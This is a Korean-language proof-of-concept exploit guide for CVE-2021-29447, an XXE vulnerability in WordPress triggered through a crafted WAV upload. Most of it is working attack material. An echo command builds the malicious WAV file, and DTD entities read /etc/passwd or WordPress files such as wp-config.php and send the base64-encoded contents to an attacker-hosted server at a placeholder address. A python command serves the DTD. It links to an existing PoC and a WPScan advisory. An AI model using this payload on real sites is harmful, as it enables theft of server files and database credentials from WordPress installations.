
CVE-2021-29447에 대한 개념 증명 익스플로잇으로, WordPress의 XXE 취약점을 이용해 조작된 WAV 파일을 통해 임의 파일 노출 및 SSRF를 가능하게 합니다.
임의 파일 유출: 호스트 파일 시스템의 모든 파일 내용을 검색할 수 있습니다. 예를 들어 데이터베이스 자격 증명과 같은 민감한 데이터를 포함하는 wp-config.php 파일이 있습니다. 서버 측 요청 위조(SSRF): WordPress 설치를 대신하여 HTTP 요청을 보낼 수 있습니다. 환경에 따라 심각한 영향을 미칠 수 있습니다. 취약점 악용
이 취약점의 영향을 받는 WordPress 사이트는 wpscan 도구를 사용한 열거 과정에서 식별되었습니다.

매우 쉽습니다. bash 콘솔에서 다음을 실행하세요.
nano poc.wav
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOURSEVERIP:PORT/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
공격자 PC에서 웹 서버에서 실행할 코드로 dtd 파일을 생성하세요.
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >
참고: WordPress 파일을 읽으려면 "../WP-FILE.php" 구문을 사용하세요.
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=../index.php">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >
파일 디렉터리에 Python 서버를 호스팅하세요 (python3 -m http.server 8081)
https://github.com/motikan2010/CVE-2021-29447 https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5